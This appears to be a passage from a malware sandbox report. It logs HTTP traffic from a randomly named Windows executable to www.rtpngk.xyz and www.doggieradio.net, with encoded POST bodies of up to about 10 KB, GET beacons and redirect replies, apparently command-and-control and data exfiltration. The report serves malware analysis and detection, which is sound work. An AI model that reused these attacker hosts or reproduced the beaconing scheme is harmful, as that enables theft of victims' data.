                                                      Data Raw: 70 50 5f 38 3d 59 5a 31 33 33 54 4e 49 34 38 58 64 65 35 33 7a 36 4b 66 38 2f 58 4e 73 33 61 74 4b 6d 73 71 58 70 4b 32 6a 32 57 78 4f 76 44 78 2b 77 49 68 7a 77 63 6d 4f 64 77 72 50 67 63 66 55 32 43 73 34 70 41 55 73 4e 6a 56 37 6d 55 4e 41 62 73 31 75 4a 64 32 72 6b 53 52 4f 33 49 66 50 42 51 32 54 56 34 34 6e 77 4f 32 38 34 61 79 74 77 2f 4e 38 37 42 4d 38 74 59 68 6d 30 63 53 62 73 6c 4a 4c 4b 52 6a 6f 6f 58 59 6e 6f 37 37 66 2f 4a 6e 4e 77 56 4d 6a 53 67 32 39 6b 33 51 43 4d 69 7a 49 61 33 75 79 30 70 78 49 6e 71 74 71 75 2f 67 51 78 6b 43 6e 6f 48 42 70 4e 62 54 6b 50 35 56 6d 72 67 3d 3d
                                                      Data Ascii: pP_8=YZ133TNI48Xde53z6Kf8/XNs3atKmsqXpK2j2WxOvDx+wIhzwcmOdwrPgcfU2Cs4pAUsNjV7mUNAbs1uJd2rkSRO3IfPBQ2TV44nwO284aytw/N87BM8tYhm0cSbslJLKRjooXYno77f/JnNwVMjSg29k3QCMizIa3uy0pxInqtqu/gQxkCnoHBpNbTkP5Vmrg==
                                                      Sep 11, 2024 11:19:56.435580969 CEST844INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:19:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 167
                                                      Connection: close
                                                      Cache-Control: max-age=3600
                                                      Expires: Wed, 11 Sep 2024 10:19:56 GMT
                                                      Location: https://www.rtpngk.xyz/altr/
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2BKBHNYmdfNxb8dNcz4CPWLUATHjz0MNbQ2HJ35IIpnmzVYZT8zD94VtzfTQ2trtmmzdVTEFsLeSDTkSVjCqMpTrXlr5BCqeWP%2F1Nwf%2BI6O%2B54D9yKtDxK4YPxpmHGBtTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Vary: Accept-Encoding
                                                      Server: cloudflare
                                                      CF-RAY: 8c16943969d24392-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.463358188.114.97.3803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:58.536246061 CEST777OUTPOST /altr/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.rtpngk.xyz
                                                      Origin: http://www.rtpngk.xyz
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.rtpngk.xyz/altr/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 59 5a 31 33 33 54 4e 49 34 38 58 64 65 5a 48 7a 38 64 72 38 33 58 4e 74 36 4b 74 4b 30 73 71 54 70 4b 79 6a 32 58 45 44 6f 31 42 2b 77 73 70 7a 78 59 79 4f 51 51 72 50 71 38 66 52 34 69 74 30 70 41 49 53 4e 6a 70 37 6d 55 78 41 62 74 6c 75 4a 4e 4b 6b 6c 43 52 4d 69 59 66 65 4d 77 32 54 56 34 34 6e 77 4f 79 61 34 61 71 74 33 50 39 38 30 41 4d 37 6a 34 68 6c 31 63 53 62 6e 46 4a 50 4b 52 69 39 6f 56 73 5a 6f 35 7a 66 2f 49 33 4e 7a 42 34 67 5a 67 32 2f 67 33 51 51 64 79 32 57 52 6c 37 4f 39 72 39 42 68 2b 73 58 69 5a 78 4b 67 56 6a 77 36 48 6c 61 51 63 61 51 43 36 6f 76 77 70 49 74 47 57 70 4f 44 71 74 75 53 4d 48 62 2b 36 43 51 78 41 30 3d
                                                      Data Ascii: pP_8=YZ133TNI48XdeZHz8dr83XNt6KtK0sqTpKyj2XEDo1B+wspzxYyOQQrPq8fR4it0pAISNjp7mUxAbtluJNKklCRMiYfeMw2TV44nwOya4aqt3P980AM7j4hl1cSbnFJPKRi9oVsZo5zf/I3NzB4gZg2/g3QQdy2WRl7O9r9Bh+sXiZxKgVjw6HlaQcaQC6ovwpItGWpODqtuSMHb+6CQxA0=
                                                      Sep 11, 2024 11:19:58.981581926 CEST838INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:19:58 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 167
                                                      Connection: close
                                                      Cache-Control: max-age=3600
                                                      Expires: Wed, 11 Sep 2024 10:19:58 GMT
                                                      Location: https://www.rtpngk.xyz/altr/
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VHAL07MT7La40jbuISBCgvpcrIc%2FngHLO0muijQFYCErD4hzzisNj7J123aZbfQNH8KKbBuMeuvhnhXMHjf80KKNtuyj5lqHM8OIyfujdNuElJ8MeC6i6D8WfDHLYyfbBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Vary: Accept-Encoding
                                                      Server: cloudflare
                                                      CF-RAY: 8c1694494ce5c40c-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.463359188.114.97.3803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:01.082154036 CEST10859OUTPOST /altr/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.rtpngk.xyz
                                                      Origin: http://www.rtpngk.xyz
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.rtpngk.xyz/altr/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 59 5a 31 33 33 54 4e 49 34 38 58 64 65 5a 48 7a 38 64 72 38 33 58 4e 74 36 4b 74 4b 30 73 71 54 70 4b 79 6a 32 58 45 44 6f 31 4a 2b 77 2b 78 7a 77 36 61 4f 52 51 72 50 30 73 66 51 34 69 73 75 70 41 42 56 4e 6a 6c 72 6d 53 39 41 61 50 39 75 65 4f 53 6b 71 43 52 4d 67 59 66 4f 42 51 32 4b 56 34 6f 6a 77 4f 43 61 34 61 71 74 33 4e 6c 38 7a 52 4d 37 7a 49 68 6d 30 63 53 48 73 6c 4a 6e 4b 52 37 47 6f 56 34 4a 6f 6f 54 66 2f 70 48 4e 6a 6b 4d 67 46 77 32 68 73 58 52 44 64 7a 4b 33 52 6c 6d 2f 39 71 4a 34 68 35 63 58 68 4e 59 41 39 52 33 72 69 68 31 69 43 50 69 79 4f 4e 45 64 2f 71 45 72 43 47 46 77 55 36 35 39 66 4d 53 65 37 5a 4f 37 6e 57 62 50 49 73 66 4b 77 70 63 69 59 75 62 74 72 49 6e 35 53 64 2f 53 69 2f 58 37 56 79 49 69 62 31 61 4d 47 2b 38 6f 62 6b 42 36 66 78 48 43 67 42 35 77 46 74 51 32 74 39 70 52 51 4c 38 76 6e 42 69 6f 6c 75 45 43 2b 54 63 43 2f 79 4e 67 58 54 39 64 4b 63 51 65 61 56 39 58 33 2b 4e 42 4b 38 32 6a 4d 51 45 70 4f 2b 30 51 2f 70 2b 43 47 53 53 54 69 4d 68 59 4a [TRUNCATED]
                                                      Data Ascii: pP_8=YZ133TNI48XdeZHz8dr83XNt6KtK0sqTpKyj2XEDo1J+w+xzw6aORQrP0sfQ4isupABVNjlrmS9AaP9ueOSkqCRMgYfOBQ2KV4ojwOCa4aqt3Nl8zRM7zIhm0cSHslJnKR7GoV4JooTf/pHNjkMgFw2hsXRDdzK3Rlm/9qJ4h5cXhNYA9R3rih1iCPiyONEd/qErCGFwU659fMSe7ZO7nWbPIsfKwpciYubtrIn5Sd/Si/X7VyIib1aMG+8obkB6fxHCgB5wFtQ2t9pRQL8vnBioluEC+TcC/yNgXT9dKcQeaV9X3+NBK82jMQEpO+0Q/p+CGSSTiMhYJv8v9qWUAHUalO29rIsTmdqErWmYJ/ZbZ+FLmPtKlBjCEtiyIvTan4PSkN4tJwciqA7JIuaRxMEiuWS36lqcPLqFm5m4Yv7Wmjzeni6JhBWm04yPMHC96c/6cFC87PqbyrwA1aV3r5Mfkz0SyCLcGMzjtMgLBd82+l1mfwEREmxgwmhbJWwIUVojm6AHRP/nW62q061S4TRrBAiPlroui9k6bLAutdiRIyanjTXxtLJdpsn2a6NLnHKNB7qha9ci5TJITRPor5lBoeZQqBer1QmfWI1v/MSyPW+AVzlv9WeEmaPuJBEHsd1MN7dTsdykaRyjWyQfGH8t0YgEutFFOhO+xg52xH+dK3WpeJON6aPCNyNXT0np2moESr+pztbudDiYtHsDl/GM2OfpmKF779hZkn2lfOz9jN14lQqmiKMKvfxhVuMPaHOIOM6pzriOI29VYUvY4HN+iW0e/uWAM8BKLK4lhDTZph0nzhuW3P72dUSzkwYFFqkpKP5LdGVb4jLsFAucmr74MnetIrNzitqnnefrNoM/7fKhkbiwaamgGOB+apmNsbri8orGIrN8Cd0oKuRXIaWCtJpC/jhfagPTY/w+RS372+ABa2NJthHXl0onDWVFtDwkSuRwdoa8+EWovt9osknvTBUcvGJVr0nPHEpXRAbNbb9 [TRUNCATED]
                                                      Sep 11, 2024 11:20:01.543066025 CEST842INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:20:01 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 167
                                                      Connection: close
                                                      Cache-Control: max-age=3600
                                                      Expires: Wed, 11 Sep 2024 10:20:01 GMT
                                                      Location: https://www.rtpngk.xyz/altr/
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KSr%2Ff0nysNpaFQAenRzZQT79L0cBZtbNeIJ1QBxoWoICjayG5fuwHnGuQ%2FgQKHfoVm3d%2F8kKlwMGEZUb64PwDmGYE0RWyOgDCPX83G3G46BVj4dMveDSKYKgBJunp3lyfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Vary: Accept-Encoding
                                                      Server: cloudflare
                                                      CF-RAY: 8c1694594ac56a4e-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.463360188.114.97.3803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:03.627640963 CEST497OUTGET /altr/?pP_8=VbdX0kog8qSHBufLtK+0qwwL6pFhzbi14fGg/CN3kiEzjMV75sm4cjiJhcKV1R019AsMCDZ1hQxpRPghO7Wf1QtEjpaGbTqiMLtSz+Xi+YiI4oFd5iwYses=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.rtpngk.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:20:04.080636978 CEST961INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:20:04 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 167
                                                      Connection: close
                                                      Cache-Control: max-age=3600
                                                      Expires: Wed, 11 Sep 2024 10:20:04 GMT
                                                      Location: https://www.rtpngk.xyz/altr/?pP_8=VbdX0kog8qSHBufLtK+0qwwL6pFhzbi14fGg/CN3kiEzjMV75sm4cjiJhcKV1R019AsMCDZ1hQxpRPghO7Wf1QtEjpaGbTqiMLtSz+Xi+YiI4oFd5iwYses=&V0Qh=4pBta8
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdFL2HA2%2BKb5tec2UHAVlpGZrKZ%2FD0hcpc%2Ft8NkFZ5sQGYotzIle91jpg1pqzyRdScHzahlnotCqoJJIoVFc7naCfOMko%2Bo0XcSWkMO5E02dnUJX%2BZaaK5EgUHhSwYiuEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8c1694692a4f42fc-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.4633613.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:09.775651932 CEST772OUTPOST /hzuv/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.doggieradio.net
                                                      Origin: http://www.doggieradio.net
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.doggieradio.net/hzuv/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 2f 4e 77 7a 4d 5a 58 57 45 59 48 52 36 44 71 64 51 30 52 71 4b 58 79 69 39 61 51 6b 38 64 5a 35 4d 76 4f 41 6a 63 50 62 44 6f 48 79 6b 70 65 2b 77 6d 58 43 6a 53 6e 48 35 66 43 6e 39 59 7a 36 6d 48 6c 66 73 56 58 56 62 63 48 49 47 75 71 76 69 4e 58 66 62 53 6d 78 62 45 4e 6f 47 78 57 52 64 74 70 58 77 7a 56 76 6d 79 36 7a 67 65 69 35 6b 78 2b 65 6a 30 73 35 6b 4c 4c 4b 42 30 4a 45 77 4f 42 4a 53 54 34 7a 78 59 50 45 69 33 6f 39 79 5a 73 61 6b 6f 66 47 48 59 33 46 79 6d 6e 55 6d 52 39 77 42 78 6c 77 59 77 4d 4d 61 6a 57 7a 78 75 77 58 70 51 48 4b 48 51 7a 75 6c 4b 45 49 4b 77 3d 3d
                                                      Data Ascii: pP_8=/NwzMZXWEYHR6DqdQ0RqKXyi9aQk8dZ5MvOAjcPbDoHykpe+wmXCjSnH5fCn9Yz6mHlfsVXVbcHIGuqviNXfbSmxbENoGxWRdtpXwzVvmy6zgei5kx+ej0s5kLLKB0JEwOBJST4zxYPEi3o9yZsakofGHY3FymnUmR9wBxlwYwMMajWzxuwXpQHKHQzulKEIKw==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      46192.168.2.4633623.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:12.315643072 CEST792OUTPOST /hzuv/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.doggieradio.net
                                                      Origin: http://www.doggieradio.net
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.doggieradio.net/hzuv/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 2f 4e 77 7a 4d 5a 58 57 45 59 48 52 36 69 61 64 53 54 46 71 66 6e 79 6c 79 36 51 6b 31 39 5a 39 4d 76 4b 41 6a 64 4b 57 44 61 7a 79 6b 4d 69 2b 78 6b 76 43 67 53 6e 48 78 2f 43 69 35 59 79 32 6d 48 34 38 73 55 48 56 62 63 44 49 47 73 79 76 6a 36 72 63 61 43 6d 7a 48 45 4e 6d 49 52 57 52 64 74 70 58 77 77 6f 43 6d 79 69 7a 67 75 79 35 6c 56 72 49 71 55 73 36 6e 4c 4c 4b 46 30 4a 49 77 4f 42 2f 53 52 64 63 78 61 33 45 69 79 55 39 79 49 73 5a 75 6f 66 49 4b 34 32 50 30 6e 6d 6b 2b 53 4d 66 66 33 34 53 66 53 45 50 53 46 48 70 67 66 52 41 37 51 6a 35 61 58 36 61 6f 4a 35 42 52 38 2b 74 49 2b 61 67 66 47 4e 32 47 38 56 76 61 70 74 68 35 6a 4d 3d
                                                      Data Ascii: pP_8=/NwzMZXWEYHR6iadSTFqfnyly6Qk19Z9MvKAjdKWDazykMi+xkvCgSnHx/Ci5Yy2mH48sUHVbcDIGsyvj6rcaCmzHENmIRWRdtpXwwoCmyizguy5lVrIqUs6nLLKF0JIwOB/SRdcxa3EiyU9yIsZuofIK42P0nmk+SMff34SfSEPSFHpgfRA7Qj5aX6aoJ5BR8+tI+agfGN2G8Vvapth5jM=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      47192.168.2.4633633.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:14.867248058 CEST10874OUTPOST /hzuv/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.doggieradio.net
                                                      Origin: http://www.doggieradio.net
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.doggieradio.net/hzuv/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 2f 4e 77 7a 4d 5a 58 57 45 59 48 52 36 69 61 64 53 54 46 71 66 6e 79 6c 79 36 51 6b 31 39 5a 39 4d 76 4b 41 6a 64 4b 57 44 61 72 79 6b 2b 61 2b 78 44 37 43 68 53 6e 48 37 66 43 6a 35 59 79 37 6d 48 77 67 73 55 4c 6a 62 66 72 49 55 66 36 76 79 2b 2f 63 54 43 6d 7a 66 45 4e 6e 47 78 57 2b 64 74 35 54 77 77 34 43 6d 79 69 7a 67 72 32 35 78 78 2f 49 73 55 73 35 6b 4c 4c 47 42 30 49 64 77 4b 6c 42 53 52 49 6a 78 4b 58 45 69 53 6b 39 31 2b 41 5a 6f 34 66 4b 4e 34 33 61 30 69 2b 37 2b 53 41 35 66 33 6c 2f 66 51 59 50 53 41 44 2f 31 62 68 76 6d 7a 37 46 48 6b 47 78 67 36 5a 57 4a 72 6e 51 42 2b 79 35 43 31 73 45 43 75 49 4e 4b 4c 64 66 75 6e 78 78 73 6a 47 57 6c 46 61 65 77 35 6d 32 36 34 6e 35 53 78 4e 71 49 39 72 5a 34 68 42 32 55 45 41 45 55 4f 58 61 4e 78 32 55 43 42 42 7a 49 58 57 79 78 79 30 32 64 67 4c 58 4f 44 33 70 68 52 50 39 4a 6c 77 2b 57 6d 41 69 71 6b 6d 49 62 4d 51 42 66 67 69 47 63 69 75 6b 42 6a 7a 4f 77 45 4c 58 51 42 36 32 47 67 43 4b 5a 47 51 4e 66 45 71 6e 33 47 54 43 4c [TRUNCATED]
                                                      Data Ascii: pP_8=/NwzMZXWEYHR6iadSTFqfnyly6Qk19Z9MvKAjdKWDaryk+a+xD7ChSnH7fCj5Yy7mHwgsULjbfrIUf6vy+/cTCmzfENnGxW+dt5Tww4Cmyizgr25xx/IsUs5kLLGB0IdwKlBSRIjxKXEiSk91+AZo4fKN43a0i+7+SA5f3l/fQYPSAD/1bhvmz7FHkGxg6ZWJrnQB+y5C1sECuINKLdfunxxsjGWlFaew5m264n5SxNqI9rZ4hB2UEAEUOXaNx2UCBBzIXWyxy02dgLXOD3phRP9Jlw+WmAiqkmIbMQBfgiGciukBjzOwELXQB62GgCKZGQNfEqn3GTCLFKDs5H8oA7Na8Z5xjm/IpnxPuv0F6hHIp9+eUTAGddBjmykd7+5LtCuqQjfD1Xzj7sixDXCoO/dPrvsBhV+Ouw73FZDQX7kYeJUtsD1bkSTfwGBmoslfunOSf+P7WtD37MWHe15fowCBVmXE87QQCsDYMYIkovfjRZYhRv28EzDHj2NmvF9ZFen+6DsI24BfO8jykRALI7ZwvcCXQLbpHp9I04LGShjAo7ZwXNY+P4uvC89B1uLpAjSWqFijMD0RxRUban6SHVeMXrUizjkajMEOsTwqZbwoZILIJxqnArILL9BHR7Of5xJ56xZtN08+ci2+xKq3gxjCibO3E9Jie46uyTT691eiiewqwUVD+xM/dRTCwAAy/v3VKzCJJLOedS1Xo2/iVPZLl+BYgo3Z1SoQssjmSkga2j7EVWl9mJHhvXU/l+kHm/pR0SoKPFzhUxezv3Xw7DmkgFZp96abTgvkf36P4e8Tf83weukbmEHqZ6hfkEDxjId6D9Emho8WkkHSQLP1BJyiM+mTq/CZMxHY1ux/773VYCwymnOLeFspgROs/4ZtDVviUcD30PiEm2VCkVr/AU93aBXIqc95xP0k5eVQF7tHmdMbpEUeJECVZEVmVXRHXFTh3bIgqCSUT8Kkuum6WJqm2ddba26q+EOGG5Io3nlwoN [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      48192.168.2.4633643.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:17.402164936 CEST502OUTGET /hzuv/?V0Qh=4pBta8&pP_8=yPYTPsOMRuT7nXzMZEh0cyOx75sbkvhbS623oo+vDaz4p8qW1TPOp1vW0qrZ2oW5wmcFkFH8avXQJuay0KjCNQuKV15vU1edPek8xw4GryuOme+JkwmIlF8= HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.doggieradio.net
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:20:17.879173040 CEST392INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 11 Sep 2024 09:20:17 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 252
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 30 51 68 3d 34 70 42 74 61 38 26 70 50 5f 38 3d 79 50 59 54 50 73 4f 4d 52 75 54 37 6e 58 7a 4d 5a 45 68 30 63 79 4f 78 37 35 73 62 6b 76 68 62 53 36 32 33 6f 6f 2b 76 44 61 7a 34 70 38 71 57 31 54 50 4f 70 31 76 57 30 71 72 5a 32 6f 57 35 77 6d 63 46 6b 46 48 38 61 76 58 51 4a 75 61 79 30 4b 6a 43 4e 51 75 4b 56 31 35 76 55 31 65 64 50 65 6b 38 78 77 34 47 72 79 75 4f 6d 65 2b 4a 6b 77 6d 49 6c 46 38 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
